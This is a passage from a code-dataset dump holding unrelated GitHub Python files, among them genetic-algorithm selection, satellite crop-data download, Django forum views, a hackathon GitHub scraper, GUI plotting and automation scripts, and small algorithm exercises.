found.')\r\n","repo_name":"sharknew1234/mp3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24739657615","text":"import random\nfrom models.shared_models import *\n\n\nclass Selection:\n\n    def __init__(self, amount_of_parents_chosen: int):\n        self.total_fitness = 0\n        self.amount_of_parents_chosen = amount_of_parents_chosen\n\n    def select_best_solutions(self, population_list: List[SolutionGA]):\n        self.total_fitness = 0\n        self.__create_weighted_wheel(population=population_list)\n        parent_list = []\n        for i in range(0, self.amount_of_parents_chosen):\n            parent_list.append(self.__select_solution_for_parent(population_list=population_list))\n        random.shuffle(population_list)\n        x = 0\n        while len(parent_list) < len(population_list):\n            parent_list.append(population_list[x])\n            x += 1\n        return parent_list\n\n    def __create_weighted_wheel(self, population: List[SolutionGA]):\n        for solution in population:\n            self.total_fitness += solution.fitness\n\n    def __select_solution_for_parent(self, population_list: List[SolutionGA]) -> SolutionGA:\n        random_float = random.random()\n        fitness_left = random_float * self.total_fitness\n        for i in population_list:\n            if i.fitness >= fitness_left:\n                return i\n            else:\n                fitness_left -= i.fitness\n","repo_name":"mforberg/SDU-THESIS-2021","sub_path":"content_generation/genetic_algorithm/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13846367937","text":"import warnings\n\nimport eocrops.tasks.curve_fitting\n\nwarnings.filterwarnings(\"ignore\")\n\nimport geopandas as gpd\nfrom scipy.signal import savgol_filter\n\nimport os\nimport numpy as np\nimport eocrops\nfrom eocrops.inputs import utils_sh as utils_sh\nfrom eocrops.inputs import sentinel2 as sentinel2\nfrom eocrops.tasks import preprocessing as preprocessing\n\ndir_path = os.path.dirname(os.getcwd())\nprint(dir_path)\n# read microplot data\nshapefile_input = gpd.read_file(\n    os.path.join(dir_path, "eo-crops/examples/layers/POLYGON.shp")\n)\n\napi = ""\nclient_id = ""\nclient_secret = ""\n\n\nconfig = utils_sh.config_sentinelhub_cred(api, client_id, client_secret)\n# Provide here your planet API key\nconfig.planet_key = ""\n\n
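Fitness-proportional ("roulette wheel") selection, which the `Selection` class above implements with a cumulative scan, is also available directly in the standard library: `random.choices` accepts per-item weights and samples with replacement. A compact sketch with a stand-in solution class (`SolutionGA` is replaced by a plain object here):

```python
import random

class Solution:                      # stand-in for SolutionGA
    def __init__(self, fitness):
        self.fitness = fitness

population = [Solution(f) for f in (1.0, 3.0, 6.0)]

# Draw 4 parents with probability proportional to fitness, which is
# exactly what the manual wheel + cumulative scan computes.
parents = random.choices(population,
                         weights=[s.fitness for s in population], k=4)
print([p.fitness for p in parents])
```

# 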
%%\n\ntime_period = (\"2020-02-15\", \"2020-08-15\")\nkwargs = dict(polygon=shapefile_input, time_stamp=time_period, config=config)\n\n\nos.getcwd()\nwarnings.filterwarnings(\"ignore\")\npatch = sentinel2.workflow_instructions_S2L2A(\n **kwargs,\n path_out=\"/home/johann/Documents/patch\", # you can specify here a path to save the EOPatch object\n coverage_predicate=0.5,\n interpolation={\"interpolate\": True, \"period_length\": 8}\n)\n\ncurve_fit = eocrops.tasks.curve_fitting.AsymmetricGaussian(range_doy=(100, 365))\nts_mean = curve_fit.get_time_series_profile(\n patch, feature=\"LAI\", feature_mask=\"MASK\"\n).flatten()\nts_mean[:2] = np.nan\n\nvalid_values = np.where(~np.isnan(ts_mean))[0]\nts_mean[: valid_values[0]] = ts_mean[valid_values[0]]\nts_mean[valid_values[-1] :] = ts_mean[valid_values[-1]]\n\nfitted = curve_fit.execute(patch, feature=\"LAI\")\n","repo_name":"j-desloires/eo-crops","sub_path":"examples/dev_test/data_download.py","file_name":"data_download.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"16240204412","text":"class Solution:\n # @param A : tuple of integers\n # @return a list of integers\n def solve(self, A):\n rev = []\n for i in range (len(A)-1,-1,-1):\n rev.append(A[i])\n \n return rev\n\n\n\nobj = Solution()\ntest = (1,2,3,4,5)\nprint(obj.solve(test))","repo_name":"aman-bcalm/Scaler-Problems","sub_path":"Primer/reverseArray.py","file_name":"reverseArray.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1155284183","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom scipy.signal import fftconvolve\n\nfrom blend import composite_paper\nfrom edge import get_edge_img\nfrom multi_res import get_mr_img_from_rgb_img\nfrom stroke import get_stroke_img\nfrom utilities import show_img\nfrom multi_res_lic import get_mrl\nimport sys \nargumentList = sys.argv \n \n# Print the usage instructions\nif len(sys.argv) != 2:\n print(\"USAGE: python3 final.py image-path\")\n exit(0)\n\nimg_path = sys.argv[1]\n# print(img_path)\nimg = cv2.imread(img_path)\nbg_img = cv2.imread(\"paper.jpg\")\n\nif img.shape[0] < 257 or img.shape[1] < 257:\n img = cv2.resize(img, (300, 300))\n\nif img_path == \"../images/castle.jpeg\":\n print(img.shape)\n img = cv2.resize(img, None, fx=2.0, fy=2.0)\n\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\nmr_img = get_mr_img_from_rgb_img(img)\n_, _, edge_img = get_edge_img(mr_img, thresh=110, thresh2=0.1)\nmrl_img = get_mrl(img)\nstrk_img = get_stroke_img(edge_img, mrl_img)\nout = composite_paper(strk_img, bg_img,0.4)\n\nedge_img = edge_img.astype(np.uint8)\nshow_img(img, splt=321,gray=False, title=\"Input\")\nshow_img(edge_img, splt=322, title=\"Edge Image\")\nshow_img(mrl_img, splt=323, title=\"Multi-resolution LIC Image\")\nshow_img(strk_img, splt=324, title=\"Stroke Image\")\nshow_img(out, splt=325, title=\"Output\")\nplt.show()\nplt.figure()\nplt.suptitle(\"Final Output\")\nshow_img(img, splt=121, title=\"Input\")\nshow_img(out, splt=122, title=\"Output\")\nplt.show()\nplt.figure()\nfor ind, i in enumerate(range(3,9)):\n out = composite_paper(strk_img, bg_img, alpha=i/10)\n show_img(out, 
splt=321+ind)\nplt.show()","repo_name":"surendra1233/automated_pencil_drawing","sub_path":"src/final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6136281962","text":"import tkinter as tk\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk\nfrom PIL import Image\n\nclass Plotter:\n def __init__(self):\n self.fig = plt.Figure(figsize=(6, 4), dpi=100)\n self.ax = self.fig.add_subplot(111)\n self.points = []\n\n def plot_data(self, event):\n # Get the coordinates of the clicked point\n x = event.xdata\n y = event.ydata\n\n if x is not None and y is not None:\n # Get the current marker\n marker = self.marker_var.get()\n\n # Plot the clicked point with the current marker and the same color\n self.ax.plot(x, y, marker=marker, color='lime')\n self.points.append((x, y, marker))\n self.canvas.draw()\n\n def clear_plot(self):\n # Clear the current plot\n self.ax.clear()\n self.points = [] # Reset the points\n self.canvas.draw()\n\n def create_gui(self):\n # Create a Tkinter window\n window = tk.Tk()\n window.title(\"Matplotlib Graph in Tkinter\")\n\n # Load and resize the image background\n img = plt.imread(r\"C:\\Users\\vihaa\\FTC-Autonomous-Planner\\FTC_Auto_Planner\\MatPlotLibTests\\background.jpg\")\n\n # Set the image as the background\n self.ax.imshow(img, extent=[-10, 10, -10, 10])\n\n # Create a canvas widget to display the graph\n self.canvas = FigureCanvasTkAgg(self.fig, master=window)\n self.canvas.draw()\n self.canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n\n # Create a toolbar for the graph\n toolbar = NavigationToolbar2Tk(self.canvas, window)\n toolbar.update()\n self.canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n\n # Create buttons to interact with the plot\n self.marker_var = tk.StringVar()\n self.marker_var.set('o') # Default marker\n\n circle_button = tk.Radiobutton(window, text=\"Circle\", variable=self.marker_var, value='o')\n circle_button.pack(side=tk.LEFT, padx=10)\n\n square_button = tk.Radiobutton(window, text=\"Square\", variable=self.marker_var, value='s')\n square_button.pack(side=tk.LEFT, padx=10)\n\n triangle_button = tk.Radiobutton(window, text=\"Triangle\", variable=self.marker_var, value='^')\n triangle_button.pack(side=tk.LEFT, padx=10)\n\n clear_button = tk.Button(window, text=\"Clear\", command=self.clear_plot)\n clear_button.pack(side=tk.LEFT, padx=10)\n\n # Bind the plot_data function to mouse clicks on the canvas\n self.canvas.mpl_connect('button_press_event', self.plot_data)\n\n # Run the Tkinter event loop\n window.mainloop()\n\n\n# Create an instance of the Plotter class and run the GUI\nplotter = Plotter()\nplotter.create_gui()\n","repo_name":"VihaanChhabria/Python-Examples","sub_path":"TkinterTests/TkinterMatplotlibP2.py","file_name":"TkinterMatplotlibP2.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6773039931","text":"import numpy as np\n\n# way faster than np.random.choice\n# arr is an array of probabilities, should sum to 1\ndef sample(arr):\n r = np.random.rand()\n s = 0\n for i, p in enumerate(arr):\n s += p\n if s > r or s == 1:\n return i\n\n # worst case if we run into floating point error, just return the last element\n # we should never get here\n return len(arr) - 1\n\n# faster than 
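The linear-scan `sample` above draws one index in O(n); when many draws come from the same distribution, the standard vectorized alternative precomputes the CDF once and binary-searches each uniform draw. A sketch under the same assumption as the original (`arr` sums to 1):

```python
import numpy as np

def sample_many(arr, n):
    cdf = np.cumsum(arr)
    cdf[-1] = 1.0  # guard against floating-point drift in the last bin
    # side='right' returns the first bin whose cumulative mass exceeds the draw.
    return np.searchsorted(cdf, np.random.rand(n), side='right')

print(sample_many([0.1, 0.2, 0.7], 5))  # e.g. [2 2 1 2 0]
```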
np.random.choice\ndef choice(arr, size = None):\n ind = np.random.randint(0, len(arr), size=size)\n return np.array(arr)[ind]\n\ndef argmax(arr):\n ties = []\n top = -np.inf\n for i, a in enumerate(arr):\n if a > top:\n top = a\n ties = [i]\n elif a == top:\n ties.append(i)\n\n return choice(ties)","repo_name":"andnp/SoftmaxPolicies","sub_path":"src/utils/random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8247463811","text":"import pyautogui\nfrom time import sleep\n\n\n\npyautogui.click(920,869,duration=1.5) \npyautogui.write('Marco',duration=2)\n\n#open file \n\nwith open('produtos.txt', 'r') as file:\n for line in file:\n line.split(',')[0]\n product = line.split(',')[1]\n unit = line.split(',')[2]\n price = line.split(',')[3]\n\n #click and edit product\n pyautogui.click(259,298,duration=2)\n pyautogui.write(product)\n\n #click and edit unit\n pyautogui.click(259,298,duration=2)\n pyautogui.write(unit)\n\n #click and edit price\n pyautogui.click(259,298,duration=2)\n pyautogui.write(price)\n\n #button register\n pyautogui.click(907,231,duration=2)\n sleep(1)","repo_name":"marcotorquato/python","sub_path":"EasyProjects/geoclick/automat-geoclick.py","file_name":"automat-geoclick.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23288375537","text":"from django.db import models\nfrom django.contrib.auth.models import User\nclass Customer(models.Model):\n \"\"\"\n This makes a customer instance\n Author:\n Trey Suiter\n \"\"\"\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n address = models.CharField(max_length=100, null=True)\n city = models.CharField(max_length=50, null=True)\n zipcode = models.CharField(max_length=7, null=True)\n phone = models.CharField(max_length=14, null=True)\n\n class Meta:\n verbose_name = (\"customer\")\n verbose_name_plural = (\"customers\")\n def __str__(self):\n return f'{self.user.first_name} {self.user.last_name}'\n \n#!This is not needed due to using ORM\n# These receiver hooks allow you to continue to\n# work with the `User` class in your Python code.\n# Every time a `User` is created, a matching `Customer`\n# object will be created and attached as a one-to-one\n# property\n# @receiver(post_save, sender=User)\n# def create_customer(sender, instance, created, **kwargs):\n# if created:\n# Customer.objects.create(user=instance)\n# # Every time a `User` is saved, its matching `Customer`\n# # object will be saved.\n# @receiver(post_save, sender=User)\n# def save_customer(sender, instance, **kwargs):\n# instance.customer.save() ","repo_name":"nss-cohort-36/bangazon-api-imagination-station-api","sub_path":"bangazonapi/models/customers.py","file_name":"customers.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13737124351","text":"from django.shortcuts import render, get_object_or_404, render_to_response, redirect\nfrom .models import Category, Product, Author, News\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import AuthorForm\nfrom django.conf import settings\nfrom .models import Comments\nfrom .forms import CommentForm\n\n\n\n@login_required(redirect_field_name=settings.LOGIN_URL)\ndef cabinet(request):\n ctx = {}\n ctx['cabinet_tab'] = 'main'\n if request.method == 'GET':\n 
try:\n            author = Author.objects.get(user=request.user.id)\n            ctx['form'] = AuthorForm(instance=author)\n        except Exception as e:\n            ctx['form'] = AuthorForm\n    elif request.method == 'POST':\n        form = AuthorForm(request.POST)\n        if form.is_valid():\n            author = Author.objects.get(user=request.user.id)\n            author.date_birth = form.cleaned_data['date_birth']\n            author.bio = form.cleaned_data['information']\n            author.type_view = form.cleaned_data['type_view']\n            author.pseudoname = form.cleaned_data['pseudoname']\n            author.save()\n            ctx['save'] = True\n            ctx['form'] = AuthorForm(instance=author)\n        else:\n            ctx['form'] = AuthorForm(request.POST)\n    return render(request, 'forum/forum/cabinet.html', ctx)\n\n\n# Product listing page\ndef ProductList(request, category_slug=None):\n    category = None\n    categories = Category.objects.all()\n    products = Product.objects.filter(available=True)\n    if category_slug:\n        category = get_object_or_404(Category, slug=category_slug)\n        products = products.filter(category=category)\n    return render(request, 'forum/product/list.html', {\n        'category': category,\n        'categories': categories,\n        'products': products\n    })\n\n\n# Product detail page\ndef ProductDetail(request, id, slug):\n    product = get_object_or_404(Product, id=id, slug=slug, available=True)\n    return render(request, 'forum/product/detail.html',\n                  {'product': product,\n                   })\n\n\ndef index(request):\n    all_books = Product.objects.all()  # 'SELECT * FROM wa_1_book;'\n    return render(request, 'index.html', {})\n\ndef news_list(request):\n    \"\"\"Display all news\n    \"\"\"\n    news = News.objects.all()\n    return render(request, "forum/forum/list.html", {"news": news})\n\n\ndef new_single(request, pk):\n    \"\"\"Display a full article\n    \"\"\"\n    new = get_object_or_404(News, id=pk)\n    comment = Comments.objects.filter(new=pk, moderation=True)\n    if request.method == "POST":\n        form = CommentForm(request.POST)\n        if form.is_valid():\n            form = form.save(commit=False)\n            form.user = request.user\n            form.new = new\n            form.save()\n        return redirect(new_single, pk)\n    else:\n        form = CommentForm()\n    return render(request, "forum/forum/new_single.html",\n                  {"new": new,\n                   "comments": comment,\n                   "form": form})\n\n\n\n","repo_name":"kotvitaliy/django_forum_car","sub_path":"forum_car/forum/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27734811036","text":"# coding: utf-8\nimport argparse\nimport recognition.util.path as path\n\nfrom recognition.util.text import Text\n\n\nclass Resize:\n\n    def __init__(self, filename, destination_path, **kwargs):\n        self._filename = filename\n        self._destination_path = destination_path\n        self._size = kwargs.get('size', (576, 768))\n\n    def generate(self):\n        fonts = path.get_fonts()\n        if len(fonts) == 0:\n            raise ValueError('No font found')\n\n        text = path.load_txt(self._filename)\n        for font in fonts:\n            pages = Text.resize(text, font=font, size=self._size)\n            with open(self._destination_path, 'w') as f:\n                for page in pages:\n                    f.write(page)\n\n\ndef process_args():\n    parser = argparse.ArgumentParser()\n\n    parser.add_argument('--filename',\n                        type=str,\n                        default=None,\n                        metavar='',\n                        help='Path to the file')\n\n    parser.add_argument('--destination-path',\n                        type=str,\n                        metavar='',\n                        default=None,\n                        help='Path where the result file is saved')\n\n    parser.add_argument('--width',\n                        type=int,\n                        default=576,\n                        metavar='',\n                        help="Image width")\n\n
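The `new_single` view above follows the Post/Redirect/Get pattern: after a valid POST it redirects instead of rendering, so refreshing the browser cannot resubmit the comment. The same shape, stripped to its skeleton (`Article` and `CommentForm` here are placeholders, not this project's models):

```python
from django.shortcuts import get_object_or_404, redirect, render

def article_detail(request, pk):
    article = get_object_or_404(Article, pk=pk)       # Article: placeholder model
    if request.method == "POST":
        form = CommentForm(request.POST)              # CommentForm: placeholder form
        if form.is_valid():
            comment = form.save(commit=False)
            comment.article = article
            comment.save()
            return redirect("article_detail", pk=pk)  # PRG: redirect on success
    else:
        form = CommentForm()
    return render(request, "detail.html", {"article": article, "form": form})
```

    parser.add_argument('--height',\n                        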
type=int,\n                        default=768,\n                        metavar='',\n                        help="Image height")\n\n    return parser.parse_args()\n\n\nif __name__ == '__main__':\n    arguments = process_args()\n\n    if not arguments.filename:\n        raise ValueError('The filename is undefined')\n\n    if not arguments.destination_path:\n        raise ValueError('The destination path is undefined')\n\n    resize = Resize(\n        filename=arguments.filename,\n        destination_path=arguments.destination_path,\n        size=(arguments.width, arguments.height))\n\n    resize.generate()\n","repo_name":"jonattanva/text-recognition","sub_path":"recognition/bin/resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12691750086","text":"# https://towardsdatascience.com/data-science-skills-web-scraping-javascript-using-python-97a29738353f\n# The link above describes scraping with selenium and firefox\nimport json\nimport requests\nfrom bs4 import BeautifulSoup\nimport click\nfrom datetime import datetime, timedelta\nimport re\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\nimport time\n\nimport logging as log\nlog.basicConfig(level=log.INFO)\n\n# Sample run\n# python github_follow_up.py --github-keyword chainlink\n@click.command(help='Gets GitHub information about hackathons from hackathon platforms')\n@click.option('--github-keyword', required=True, help="What project you're looking for on GitHub")\n@click.option('--input-file', default='next_week.json', help='What projects to check out')\n@click.option('--output-file', default='results.txt', help='Where to write the results')\n@click.option('--gitcoin/--no-gitcoin', default=True, help='Whether to also scrape Gitcoin')\ndef github_follow_up(github_keyword, input_file, output_file, gitcoin):\n    # Opening JSON file\n    hackathons = read_from_file(input_file)\n    keyworded_hackathon_projects, total_submissions = get_hackathons_with_keyword(\n        hackathons, github_keyword)\n    # Gitcoin you don't have to start from a week ago, you can just scrape the most recently finished\n    if gitcoin:\n        gitcoin_keyworded_hackathon_projects, total_gitcoin_submissions = get_gitcoin_hackathons(\n            github_keyword)\n        click.echo("Total submissions: {} + {} = {}".format(total_submissions,\n                                                            total_gitcoin_submissions, (total_submissions + total_gitcoin_submissions)))\n        output_metrics(keyworded_hackathon_projects,\n                       gitcoin_keyworded_hackathons=gitcoin_keyworded_hackathon_projects)\n        output_to_file(keyworded_hackathon_projects, output_file,\n                       gitcoin_keyworded_hackathons=gitcoin_keyworded_hackathon_projects)\n    else:\n        click.echo("Total submissions: {}".format(total_submissions))\n        output_metrics(keyworded_hackathon_projects)\n        output_to_file(keyworded_hackathon_projects, output_file)\n\n\ndef get_hackathons_with_keyword(hackathons, github_keyword):\n    hackathons_with_keyword = []\n    total_submissions = 0\n    for hackathon in hackathons:\n        has_submissions = True\n        submission_page_number = 0\n        while(has_submissions):\n            submission_page_number += 1\n            result = requests.get(hackathon['url'].split(\n                "devpost.com")[0] + "devpost.com/submissions?page={}".format(submission_page_number))\n            src = result.content\n            soup = BeautifulSoup(src, 'lxml')\n            submissions = soup.find_all(\n                'a', attrs={'class': 'block-wrapper-link fade link-to-software'})\n            if len(submissions) == 0:\n                has_submissions = False\n                break\n            for submission in submissions:\n                submission_page = requests.get(submission.attrs['href'])\n                
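The devpost crawl above uses the usual "bump the page query-parameter until a page comes back empty" loop. Reduced to a reusable generator (illustrative; the example.com URL and CSS class are made up):

```python
import requests
from bs4 import BeautifulSoup

def iter_listing(base_url, css_class):
    """Yield listing items page by page until an empty page is reached."""
    page = 0
    while True:
        page += 1
        soup = BeautifulSoup(
            requests.get(f"{base_url}?page={page}").content, "lxml")
        items = soup.find_all("a", attrs={"class": css_class})
        if not items:
            return          # an empty page terminates the crawl
        yield from items

# for link in iter_listing("https://example.com/submissions", "entry-link"):
#     print(link.attrs.get("href"))
```

                submission_src = 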
submission_page.content\n submission_soup = BeautifulSoup(submission_src, 'lxml')\n possible_githubs = submission_soup.find_all('a')\n for possible_github in possible_githubs:\n if 'href' in possible_github.attrs and \"github\" in possible_github.attrs['href']:\n total_submissions += 1\n if github_repo_has_keyword(possible_github.attrs['href'], github_keyword):\n hackathons_with_keyword.append(hackathon)\n return hackathons_with_keyword, total_submissions\n\n\ndef github_repo_has_keyword(github_url, github_keyword):\n if is_organization(github_url):\n github_org_result = requests.get(github_url)\n github_org_src = github_org_result.content\n github_org_soup = BeautifulSoup(\n github_org_src, 'lxml')\n try:\n org_repos = github_org_soup.find(\n 'div', attrs={\"class\": \"org-repos repo-list\"})\n org_repo_headers = org_repos.find_all('h3')\n except:\n return False\n for org_repo_header in org_repo_headers:\n if(repo_has_keyword(\n \"https://github.com{}\".format(org_repo_header.find('a').attrs['href']), github_keyword)):\n return True\n else:\n search_url = github_url + \"/search?q={}&unscoped_q={}\".format(\n github_keyword, github_keyword)\n if(repo_has_keyword(search_url, github_keyword)):\n return True\n return False\n\n\ndef get_gitcoin_hackathons(github_keyword):\n hackathons_with_keyword = []\n total_submissions = 0\n result = requests.get(\"https://gitcoin.co/hackathon-list\")\n src = result.content\n soup = BeautifulSoup(src, 'lxml')\n finished_hackathons = soup.find(\n text=re.compile('Finished Hackathons')).parent.parent.find_all(\n 'div', attrs={\"class\": \"card-body col-9 col-sm-8\"})\n recent_finished_hackathons = get_finished_hackathons_from_last_week(\n finished_hackathons)\n for recent_finished_hackathon in recent_finished_hackathons:\n links = recent_finished_hackathon.find_all('a')\n for link in links:\n if \"projects\" in link.attrs['href']:\n # projects_result = requests.get(\n # \"https://gitcoin.co/{}\".format(link.attrs['href']), timeout=(3.05, 27))\n options = Options()\n options.headless = True\n driver = webdriver.Firefox(options=options)\n driver.get(\"https://gitcoin.co/{}\".format(link.attrs['href']))\n time.sleep(20)\n html = driver.page_source\n driver.quit()\n # projects_src = projects_result.content\n projects_soup = BeautifulSoup(html, 'lxml')\n github_links = projects_soup.find_all('a')\n for github_link in github_links:\n if 'href' in github_link.attrs and 'github.com' in github_link.attrs['href']:\n total_submissions += 1\n if github_repo_has_keyword(github_link.attrs['href'], github_keyword):\n hackathons_with_keyword.append(link.attrs['href'])\n return hackathons_with_keyword, total_submissions\n\n\ndef get_finished_hackathons_from_last_week(finished_hackathons):\n recent_finished_hackathons = []\n for finished_hackathon in finished_hackathons:\n time_set = finished_hackathon.find_all(\"time\")\n time_end = datetime.strptime(time_set[1].text, \"%m/%d/%Y\")\n now = datetime.now()\n if now < time_end + timedelta(days=7):\n recent_finished_hackathons.append(finished_hackathon)\n return recent_finished_hackathons\n\n\ndef is_organization(possible_github_link):\n condensed_link = possible_github_link.replace(\"//\", \"/\").strip()\n if condensed_link.endswith(\"/\"):\n condensed_link = condensed_link[:-1]\n if len(condensed_link.split(\"/\")) <= 3:\n return True\n return False\n\n\ndef get_org_name(possible_github_link):\n condensed_link = possible_github_link.replace(\"//\", \"/\").strip()\n if condensed_link.endswith(\"/\"):\n condensed_link = 
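# --- Illustrative sketch (editor's addition) ---
# is_organization()/get_org_name() above classify a GitHub URL by collapsing
# "//" and counting "/"-separated pieces. Parsing the URL first avoids counting
# "https:" as a segment; a minimal alternative under the same inputs (helper
# names are hypothetical):
from urllib.parse import urlparse

def github_path_parts(url):
    """Return the non-empty path segments of a GitHub URL."""
    return [part for part in urlparse(url).path.split('/') if part]

def is_organization_parsed(url):
    # https://github.com/<org> has one path segment; <org>/<repo> has two.
    return len(github_path_parts(url)) == 1
# --- end sketch ---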
condensed_link[:-1]\n return condensed_link.split(\"/\")[2]\n\n\ndef repo_has_keyword(repo_url, github_keyword):\n search_url = repo_url + \"/search?q={}&unscoped_q={}\".format(\n github_keyword, github_keyword)\n github_result = requests.get(search_url)\n github_src = github_result.content\n github_soup = BeautifulSoup(github_src, 'lxml')\n h3_tags = github_soup.find_all('h3')\n for h3_tag in h3_tags:\n if \"code result\" in h3_tag.text:\n return True\n return False\n\n\ndef read_from_file(input_file):\n with open(input_file) as file:\n hackathons = json.load(file)\n return hackathons\n\n\ndef output_to_file(keyworded_hackathons, output_file, gitcoin_keyworded_hackathons=None):\n file = open(output_file, \"a+\")\n file.write(str(datetime.now()) + \"\\n\")\n file.write(str([str(hackathon) for hackathon in keyworded_hackathons]) + \"\\n\")\n if gitcoin_keyworded_hackathons:\n file.write(str([str(hackathon)\n for hackathon in gitcoin_keyworded_hackathons]) + \"\\n\")\n file.close()\n\n\ndef output_metrics(keyworded_hackathons, gitcoin_keyworded_hackathons=None):\n click.echo(str(datetime.now()))\n total_prize_pool = 0\n for hackathon in keyworded_hackathons:\n total_prize_pool += hackathon['prizes']\n\n if len(keyworded_hackathons) > 0:\n click.echo(\" Number of devpost hackathon projects {}\".format(\n len(keyworded_hackathons)))\n log.info(keyworded_hackathons)\n log.info(\" Average prize pool of submissions: \" +\n str(total_prize_pool / len(keyworded_hackathons)))\n else:\n click.echo(\" No devpost projects had that keyword :(\")\n # gitcoin (entries here are project URLs, so no prize-pool average is computed)\n if gitcoin_keyworded_hackathons is not None:\n if len(gitcoin_keyworded_hackathons) > 0:\n click.echo(\" Number of gitcoin hackathon projects {}\".format(\n len(gitcoin_keyworded_hackathons)))\n log.info(gitcoin_keyworded_hackathons)\n else:\n click.echo(\" No gitcoin projects had that keyword :(\")\n\n\ndef main():\n github_follow_up()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"PatrickAlphaC/hackathon_scraper","sub_path":"github_follow_up.py","file_name":"github_follow_up.py","file_ext":"py","file_size_in_byte":9621,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"72872509033","text":"import os\n\nPN_DELIVERY_TOPIC = 'pushowl.entity.pn_delivery'\nPN_CLICK_TOPIC = 'pushowl.entity.pn_click'\n\n# Confluent cloud configurations\nSCHEMA_REGISTRY_URL = os.environ.get('SCHEMA_REGISTRY_URL')\nBROKER_URL = os.environ.get('BROKER_URL')\nCONFLUENT_KAFKA_API_KEY = os.environ.get('CONFLUENT_KAFKA_API_KEY')\nCONFLUENT_KAFKA_API_SECRET = os.environ.get('CONFLUENT_KAFKA_API_SECRET')\nSCHEMA_REGISTRY_BASIC_AUTH_USER_INFO = os.environ.get('SCHEMA_REGISTRY_BASIC_AUTH_USER_INFO')\n","repo_name":"kkrbalam/ccloud-experiments","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31691209238","text":"from collections import deque\n\ndef solution(bridge_length, weight, truck_weights):\n answer = 0\n sum_weight = 0\n bridge = deque([0 for i in range(bridge_length)])\n while truck_weights:\n pop_truck = bridge.popleft()\n sum_weight -= pop_truck\n if sum_weight + truck_weights[0] <= weight:\n truck = truck_weights.pop(0)\n bridge.append(truck)\n sum_weight += truck\n else:\n bridge.append(0)\n answer += 1\n 
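# --- Illustrative sketch (editor's addition) ---
# The Confluent config module above returns None for any unset variable and
# only fails much later, inside the Kafka client. A fail-fast variant for the
# same settings (the helper name is hypothetical):
import os

REQUIRED_VARS = ('SCHEMA_REGISTRY_URL', 'BROKER_URL',
                 'CONFLUENT_KAFKA_API_KEY', 'CONFLUENT_KAFKA_API_SECRET')

def require_env(name):
    value = os.environ.get(name)
    if value is None:
        raise RuntimeError('missing required environment variable: ' + name)
    return value

# settings = {name: require_env(name) for name in REQUIRED_VARS}
# --- end sketch ---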
answer += len(bridge)\n return answer","repo_name":"sumnii/Al-th","sub_path":"sumsong/stack_queue/[2]다리를지나는트럭.py","file_name":"[2]다리를지나는트럭.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9223199532","text":"import sys\nimport time\nimport cv2\nimport numpy as np\nfrom ctypes import *\nfrom PIL import Image, ImageDraw\nfrom os import path\n\nimport BarcodeScanner as MWB\nimport MWParser as MWP\nimport MWResult as MWR\n\neffortLevel = 4\nuseMultiCode = False\nuseTiles = False\nsuppressOutput = False\nwriteImage = False\ntilesX = 6\ntilesY = 6\noverlap = 6\nmaxThreads = 4\n\nargc = len(sys.argv)\n\n# if argc < 2:\n# print(\"usage: pythonDemo [-En] [-M] [-S] [-T] [-Xn] [-Yn] [-On] [-Rn] [-W] filename\\n\\n\" +\n# \" -En Effort level (1-5, default \"+str(effortLevel)+\")\\n\" +\n# \" -M Enable multi-code\\n\" +\n# \" -S Suppress barcode results\\n\" +\n# \" -T Generate tiled regions\\n\" +\n# \" -Xn Tiles X dimension (default \"+str(tilesX)+\")\\n\" +\n# \" -Yn Tiles Y dimension (default \"+str(tilesY)+\")\\n\" +\n# \" -On Tiles overlap percentage (default \"+str(overlap)+\")\\n\" +\n# \" -Rn Maximum threads tiles/regions (default \"+str(maxThreads)+\")\\n\" +\n# \" -W Write output image\\n\" +\n# \" filename Image file to scan for barcodes\\n\\n\")\n# exit()\n\nfor x in range(argc-2):\n arg = sys.argv[x+1]\n \n # Effort level (assume 3rd character is 1-5)\n if arg[0:2].upper() == \"-E\":\n effortLevel = 